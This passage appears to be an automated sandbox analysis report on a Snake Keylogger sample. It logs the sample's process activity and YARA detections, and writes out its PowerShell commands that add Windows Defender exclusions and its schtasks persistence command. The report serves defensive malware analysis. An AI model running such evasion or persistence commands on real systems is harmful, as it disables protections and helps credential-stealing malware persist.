Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597216
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597109
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597000
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 596890
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 596660
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 596516
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 596357
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 596241
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 596140
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 596029
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595921
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595812
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595703
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595594
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595484
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595375
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595265
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595156
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595046
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 594937
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 594714
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 594607
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 594500
Source: EDyxAgkldisLe.exe, 00000017.00000002.3689470332.00000000009F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcac7a674eafb1<
Source: EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcac9db89d7b60<
Source: rPO0977-6745.exe, 0000000A.00000002.3690480544.0000000001206000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe"
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe" Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe" Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\rPO0977-6745.exe Memory written: C:\Users\user\Desktop\rPO0977-6745.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Memory written: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe" Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe" Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp" Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe" Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\rPO0977-6745.exe Queries volume information: C:\Users\user\Desktop\rPO0977-6745.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Queries volume information: C:\Users\user\Desktop\rPO0977-6745.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Queries volume information: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Queries volume information: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\rPO0977-6745.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.3693041192.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3693243826.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3693243826.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3693041192.00000000029EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
